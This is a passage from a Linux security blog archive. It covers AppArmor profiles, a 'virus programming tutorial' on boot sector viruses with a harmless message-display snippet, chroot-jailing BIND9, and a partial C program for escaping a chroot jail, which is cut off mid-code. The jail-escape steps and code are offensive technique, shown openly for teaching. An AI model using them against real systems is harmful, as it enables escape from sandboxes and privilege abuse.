<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">Capability entries:</span> determine what privileges a confined process is allowed to use.</div>
</li>
</ul>
</div>
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
As an example take a look at <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/bin.ping</span>:</div>
<div class="code" style="background-attachment: initial; background-clip: initial; background-color: white; background-origin: initial; background-position: 100% 0%; border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;">#include <tunables/global>
/bin/ping flags=(complain) {
#include <abstractions/base>
#include <abstractions/consoles>
#include <abstractions/nameservice>
capability net_raw,
capability setuid,
network inet raw,
/bin/ping mixr,
/etc/modules.conf r,
}
</pre>
</div>
<div class="list itemizedlist" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline; white-space: normal;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">#include <tunables/global>:</span> include statements from other files. This allows statements pertaining to multiple applications to be placed in a common file.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/bin/ping flags=(complain):</span> path to the profiled program, also setting the mode to <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">complain</span>.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">capability net_raw,:</span> allows the application access to the CAP_NET_RAW Posix.1e capability.</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/bin/ping mixr,:</span> allows the application read and execute access to the file.</div>
</li>
</ul>
</div>
</div>
</div>
</span></span></pre>
</div>
</li>
</ul>
</div>
</div>
</div>
<br />
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com1tag:blogger.com,1999:blog-6934113520237822184.post-70000866690826787262012-11-12T00:26:00.001-08:002012-11-12T00:30:59.759-08:00Virus Programming Tutorial-3<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<b><span style="font-size: large;">Boot Sector Virus</span></b></div>
The boot sector virus can be the simplest or the most sophisticated of all computer viruses. On the one hand, the boot sector is always located in a very specific place on disk. Therefore,both the search and copy mechanisms can be extremely quick and simple, if the virus can be contained wholly within the boot sector.<br />
On the other hand, since the boot sector is the first code to gain control after the ROM startup code, it is very difficult to stop before it loads. If one writes a boot sector virus with sufficiently sophisticated anti-detection routines, it can also be very difficult to detect after it loads, making the virus nearly invincible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdStqCZo6K5OeMZgZ-jYeT6N9SPx13qDCd20qd3NG4Hj1Y-byF7rwTbgMeWrcqi9G6pq4O9VNuzX-EhXdbGmrm4MOOMFFLCGXQwqJtv8wUAu9KzpkqttAyvjadl8mS0JmvogymF7UHYe33/s1600/boot-sector-virus.png" imageanchor="1"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdStqCZo6K5OeMZgZ-jYeT6N9SPx13qDCd20qd3NG4Hj1Y-byF7rwTbgMeWrcqi9G6pq4O9VNuzX-EhXdbGmrm4MOOMFFLCGXQwqJtv8wUAu9KzpkqttAyvjadl8mS0JmvogymF7UHYe33/s400/boot-sector-virus.png" width="640" /></a></div>
<br />
<br />
When a PC is first turned on, the CPU begins executing the machine language code at the location F000:FFF0. The system BIOS ROM (Basic-Input-Output-System Read-Only-Memory) is located in this high memory area, so it is the first code to be executed by the computer. This ROM code is written in assembly language and stored on chips (EPROMS) inside the computer. Typically this code will perform several functions necessary to get the computer up and running properly. First, it will check the hardware to see what kinds of devices are a part of the computer (e.g., color or mono monitor, number and type of disk drives) and it will see whether these devices are working correctly. The most familiar part of this startup code is the memory test, which cycles through all the memory in the machine twice, displaying the addresses on the screen. The startup code will also set up an interrupt table in the<br />
lowest 1024 bytes of memory. This table provides essential entry points (interrupt vectors) so all programs loaded later can access the BIOS services. The BIOS startup code also initializes a data<br />
area for the BIOS starting at the memory location 0040:0000H, right above the interrupt vector table. Once these various house-keeping chores are done, the BIOS is ready to transfer control to<br />
the operating system for the computer, which is stored on disk.<br />
<br />
//Sample Kilroy Virus Code<br />
DISP_MSG:<br />
MOV SI,OFFSET MESSAGE ;set offset of message up<br />
DM1: <br />
MOV AH,0EH ;Exxecute BIOS INT 10H,Fctn OEH<br />
LODSB ;get character to display <br />
OR AL,AL<br />
JZ DM2 ;repeat until 0<br />
INT 10H ;Display it <br />
JMP SHORT DM1 ;and get another<br />
DM2: RET<br />
<br />
MESSAGE: DB 'Kilroy and #!sh@1 was here!' ,0DH,0AH,0AH,0 <br />
<br />
Besides displaying a message, the virus can be noticed as it searches for drives to infect,especially if you have a second floppy or drive. If your hard disk is infected,or if you have no hard disk, you will notice that the second floppy lights up for a second or two before your machine boots up.<br />
This is a pretty rudimentary virus. It can make mistakes when infecting the hard drive and miss the boot sector. It can only replicate when the machine boots up. And it can get stuck in places<br />
where it cannot replicate any further (for example, on a system with only one floppy disk and a hard disk). Still, it will do it’s job, and travel all around the world if you’re not careful with it.<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-80028046955742006172012-11-09T11:19:00.000-08:002012-11-09T11:23:44.042-08:00Jail Bind-9 in Linux<div dir="ltr" style="text-align: left;" trbidi="on">
On Unix-like operating systems, such as Linux, a chroot jail is the
common expression used to describe a section of a filesystem that is
sectioned off for a particular user. On a web server, it is
particularly useful for the security of shared hosting accounts.<br />
Without a chroot jail, a user with limited file permissions would
still be able to navigate to top-level directories. As an example,
suppose the user’s directory is <b>/home/user</b>. Without
chroot, nothing would prevent the user from navigating up to /home to
see other users’ directories or even navigating up to <b>/</b> where they can see <b>/etc, /usr, /var, /lib</b><i>,</i>
and other system-critical directories. Although the user would not
have the permissions to edit them, they would be able to see the files
and target specific ones to try to exploit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqSHwGsdfOu9tTjrOzNYndleOy-0TyvlUqKd4JDf443TLpTKDYw-8mdtH-0dMHzVEDQRKO6cva5bc8XNdgBW1xi16Hs-TA1FBiG7A9aG3iY5Dh1N9zp4R9_UN4CoKdNweppvxjIELsjotM/s1600/Apache-Chroot.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqSHwGsdfOu9tTjrOzNYndleOy-0TyvlUqKd4JDf443TLpTKDYw-8mdtH-0dMHzVEDQRKO6cva5bc8XNdgBW1xi16Hs-TA1FBiG7A9aG3iY5Dh1N9zp4R9_UN4CoKdNweppvxjIELsjotM/s400/Apache-Chroot.gif" width="400" /></a></div>
<br />
<br />
We can use following steps to jail bind in linux operating systems. <br />
<br />
<b>1:</b>create a jail path<br />
<b>mkdir /named/jail</b><br />
<b><br /></b>
<b>2:</b>create following directories inside jail folder<br />
<b>mkdir -p /named/jail/etc<br />mkdir -p /named/jail/var </b><br />
<b>mkdir -p /named/jail/dev</b><br />
<b><br /></b>
<b>3:</b>Create following files inside /named/jail/dev<br />
<b>mknod null c 1 3<br />mknod zero c 1 5<br />mknod random c 1 8</b><br />
<br />
<b>4:</b>Edit the default file in etc of bind 9<br />
<b>gedit /etc/default/bind9</b><br />
<b></b><br />
<b>OPTIONS="-u bind -t /named/jail -c /named/jail/etc/bind/named.conf "</b><br />
<div>
<b><br /></b></div>
This file contain three parameters.<br />
<b>-t:</b> jail path <br />
<b>-c</b>: configuration file<br />
<b>-u:</b> user<br />
<b><br /></b>
<b><br /></b>
<b>5:</b>Cut /etc/bind folder and paste it inside /named/jail/etc<br />
<b>mv /etc/bind /named/jail/etc/bind</b><br />
<br />
<b>6:</b>Create a symbolic link of file in /etc folder<br />
<b>ln -s /named/jail/etc/bind /etc/bind</b><br />
<br />
<b>7:</b>Use following command to run bind in debugging mode.<br />
<b>named -g -d 9</b><br />
<br />
<b>8:</b>Now use nslookup,dig to check whether bind9 is working properly or not.<br />
<b>nslookup </b><br />
<b>>server host-ip-address </b>{ipv4 adress of host that is running bind server}<br />
<b>>localhost </b>{domain name for which you want to find ipv4 address}<br />
<br />
OR<br />
<br />
<b>dig @host-ip-address-of-bind-server doamin-name</b><br />
example:dig @192.168.56.139 eva.localhost<br />
<br />
/*Also change path used in named.conf and named.conf.local */</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-87164240492897818692012-10-19T20:02:00.002-07:002012-10-19T20:02:40.109-07:00How to break out of a jail in Linux <div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXkJD0ieZpkA21UFx9gHVxSlRWIR0ftNw5xeScJLAtPHxQ9O8s-9cVLIAgLYbsfq5XPAdVEtWrVMfDSxyBdpNadktM4lijUl8EN5WFIEwISpmlAvlHyaQhuNrxobEQQrTA9dlQxC07Btv/s1600/jail-break.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXkJD0ieZpkA21UFx9gHVxSlRWIR0ftNw5xeScJLAtPHxQ9O8s-9cVLIAgLYbsfq5XPAdVEtWrVMfDSxyBdpNadktM4lijUl8EN5WFIEwISpmlAvlHyaQhuNrxobEQQrTA9dlQxC07Btv/s400/jail-break.jpg" width="400" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<div style="background-color: white; text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">Whilst <tt>chroot()</tt> is reasonably secure, a program can escape from its trap. So long as a program is run with <tt>root</tt> (<i>ie</i> UID <tt>0</tt>) privilages it can be used to break out of a <tt>chroot()</tt>ed area. For a user to do this, they would need access to:</span></div>
<div align="left" style="background-color: white;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<blockquote>
<table border="0"><tbody>
<tr><td align="left" valign="top"></td><td align="left" valign="top"><ul>
<li><span style="font-family: Verdana, sans-serif;">C compiler or a Perl interpreter</span></li>
</ul>
</td></tr>
<tr><td align="left" valign="top"><span style="font-family: Verdana, sans-serif;"><br /></span></td><td align="left" valign="top"><ul>
<li><span style="font-family: Verdana, sans-serif;">Security holes to gain root access</span></li>
</ul>
</td></tr>
</tbody></table>
</blockquote>
</div>
<div style="background-color: white; text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">It should be noted that this document was written with protecting web servers from rogue CGI scripts in mind. Therefore it is not unreasonable to assume that a user has access to a Perl interpreter. It is then a matter for the user to gain root access via security holes on the box running the web server. Whilst this is outside the topic of the document, an attacker could make use of application programs which are <tt>setuid</tt>-root and have security holes within them. In a well maintained <tt>chroot()</tt> area such programs should not exist. However, it should be noted that maintaining a<tt>chroot()</tt>ed environment is a non-trival task, for example system patches which fix such security holes will not know about the copies of the programs within the <tt>chroot()</tt>ed area. Ensuring that there are no <tt>setuid</tt>-root executables within the padded cell is going to be a must.</span></div>
<div style="background-color: white; text-align: -webkit-auto;">
<span style="font-family: Verdana, sans-serif;">To break out of a <tt>chroot()</tt>ed area, a program should do the following:</span></div>
<blockquote style="background-color: white; text-align: -webkit-auto;">
<div align="left">
<br />
<ol>
<li><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Create a temporary directory in its current working directory</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Open the current working directory. Only required if chroot() changes the calling program's working directory.</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Change the root directory of the process to the temporary directory using chroot().</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Use fchdir() with the file descriptor of the opened directory to move the current working directory outside the chroot()ed area. Only required if chroot() changes the calling program's working directory.</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Perform chdir("..") calls many times to move the current working directory into the real root directory.</span></li>
<li><span style="background-color: transparent;"> </span><span style="background-color: white; font-family: Verdana, sans-serif; text-align: -webkit-auto;">Change the root directory of the process to the current working directory, the real root directory, using chroot(".")</span></li>
</ol>
</div>
</blockquote>
<br />
Sample Code In c :<br />
<br />
<div align="center" style="background-color: white;">
<br class="Apple-interchange-newline" /><table border="0" cellspacing="0"><tbody>
<tr><th align="left" bgcolor="#bfbfbf" colspan="2">Breaking <tt>chroot()</tt></th></tr>
<tr><td align="right" bgcolor="#bfbfbf">001 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #include <stdio.h> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">002 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #include <errno.h> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">003 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #include <fcntl.h> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">004 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #include <string.h> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">005 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #include <unistd.h> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">006 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #include <sys/stat.h> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">007 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #include <sys/types.h> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">008 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">009 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">010 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** You should set NEED_FCHDIR to 1 if the chroot() on your </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">011 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** system changes the working directory of the calling </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">012 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** process to the same directory as the process was chroot()ed </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">013 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** to. </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">014 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">015 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** It is known that you do not need to set this value if you </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">016 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** running on Solaris 2.7 and below. </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">017 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">018 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">019 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #define NEED_FCHDIR 0 </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">020 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">021 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #define TEMP_DIR "waterbuffalo" </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">022 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">023 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* Break out of a chroot() environment in C */</code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">024 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">025 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> int main() { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">026 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> int x; /* Used to move up a directory tree */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">027 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> int done=0; /* Are we done yet ? */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">028 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #ifdef NEED_FCHDIR </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">029 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> int dir_fd; /* File descriptor to directory */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">030 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #endif </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">031 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> struct stat sbuf; /* The stat() buffer */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">032 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">033 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">034 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** First we create the temporary directory if it doesn't exist </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">035 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">036 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> if (stat(TEMP_DIR,&sbuf)<0) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">037 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> if (errno==ENOENT) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">038 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> if (mkdir(TEMP_DIR,0755)<0) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">039 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR, </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">040 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> strerror(errno)); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">041 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> exit(1); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">042 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">043 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } else { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">044 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR, </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">045 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> strerror(errno)); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">046 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> exit(1); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">047 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">048 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } else if (!S_ISDIR(sbuf.st_mode)) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">049 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">050 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> exit(1); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">051 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">052 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">053 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #ifdef NEED_FCHDIR </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">054 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">055 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** Now we open the current working directory </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">056 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">057 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** Note: Only required if chroot() changes the calling program's </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">058 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** working directory to the directory given to chroot(). </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">059 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> ** </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">060 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> */ </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">061 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> if ((dir_fd=open(".",O_RDONLY))<0) { </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">062 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> fprintf(stderr,"Failed to open "." for reading - %s\n", </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">063 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> strerror(errno)); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">064 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> exit(1); </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">065 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> } </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">066 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> #endif </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">067 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> </code></span></td></tr>
<tr><td align="right" bgcolor="#bfbfbf">068 </td><td align="left" bgcolor="#000000"><span style="color: white;"><code> /* </code></span></td></tr>
